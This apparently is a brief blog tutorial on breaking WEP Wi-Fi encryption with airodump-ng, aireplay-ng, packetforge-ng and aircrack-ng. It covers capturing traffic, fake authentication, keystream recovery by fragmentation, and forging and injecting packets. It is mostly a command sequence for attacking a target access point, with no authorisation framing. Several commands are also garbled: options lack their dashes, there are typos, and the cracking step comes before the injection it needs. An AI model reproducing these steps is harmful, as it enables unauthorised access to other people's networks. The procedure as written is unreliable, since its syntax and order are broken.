WEP is an old encryption but it is still used in some networks. It uses algorithm called RC4 where each packet is encrypted at access point and is decrypted at client.

Assuming wifi card to be in monitor mode.
Checking available networks:
>airodump-ng mon0
Launching airodump on target network
>airodump-ng channel ch bssid write filename mon0
We can see differnt clients connected to network if any. It is the simplest case.
Now cracking the cap file created in last step.
>aircrack-ng [file-name]

Considering the AP was idle or had no clients associated with big data use. Now, we need to inject our own packets but for that we need to authenticate our wifi card with the AP else it will ignore any request.

Using Fake authentication :
>aireplay-ng fakeauth 0 -a [target MAC] -h [our MAC] [intefrace]

We can see AUTH OPN.


Obtaining about 1500 bytes of PRGA (pseudo random generation algorithm) which can be used to forge a new packet which can be injected into traffic to generate new keys.

>aireplay-ng fragment -b [target MAC] -h [our MAC] [interface]


Next, forge a new packet:

>packetforge-ng -0 -a [target MAC] -h [our MAC] -k -l -y [out from last step.xor] -w [output]


Now running aircrack to crack the password as done before.
Now injecting forged packet into traffic:

>aireplay-ng -2 -r [out from last step] [interface]


Leave a Reply